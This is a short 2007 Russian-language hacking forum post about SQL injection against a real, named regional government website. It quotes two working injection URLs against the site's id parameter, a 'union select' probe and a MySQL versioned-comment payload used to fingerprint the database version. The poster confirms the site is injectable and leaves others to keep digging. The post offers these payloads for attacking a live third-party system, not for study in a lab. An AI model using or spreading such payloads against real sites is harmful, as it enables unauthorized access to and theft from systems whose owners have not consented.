Показать сообщение отдельно

  #2787  
Старый 29.07.2007, 12:23
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
По умолчанию

To 0nep@t0p. По поводу
Цитата:
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=-395+union+select+1,2,3,4,5/*
Тут действительно скуль 3 версии (точнее 32359). И иньекция возможна. Вот как удалось определить версию
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=395+/*!32359+AND+0+*/
Помогла статья http://www.securitylab.ru/contest/212101.php - SQL инъекция в MySQL сервере третей версии.
Но дальше не копал, мороки много если нужно колупай.
З.Ы. Оказываеться не только UNION SELECT
 
Ответить с цитированием